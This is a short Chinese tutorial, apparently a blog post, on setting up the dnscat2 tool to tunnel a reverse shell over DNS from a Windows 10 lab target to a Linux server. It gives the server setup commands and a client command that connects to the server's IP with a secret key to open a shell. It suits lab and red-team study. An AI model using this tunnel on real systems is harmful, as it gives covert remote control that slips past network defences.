使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
a752066288 分钟前
零基础实操:小龙虾 AI OpenClaw 接入 Kimi 详细步骤
运维·服务器
bksczm18 分钟前
文件描述符
linux
Goldbioinformatics25 分钟前
Windows版Claude Cowork启动Linux问题
linux·运维·windows
念恒1230637 分钟前
Ext系列文件系统(下)
linux·运维·服务器
小贾要学习39 分钟前
【Linux】Linux高性能IO多路复用:epoll全方位详解(从原理到实战)
linux·服务器·网络
llhm1 小时前
tsp学习笔记——LINUX SDK编译2(2)Kernel6.1 Linux
linux·笔记·学习
xiaoshuaishuai81 小时前
C# CDN加速与离线包优化PowerSetting慢问题
开发语言·windows·spring·c#
韭菜钟1 小时前
Windows下,在Github Copilot Chat/CLI中使用obra/superpowers
windows·github·copilot
布吉岛的石头1 小时前
Docker Compose编排实战:多容器应用从开发到生产
运维·docker·容器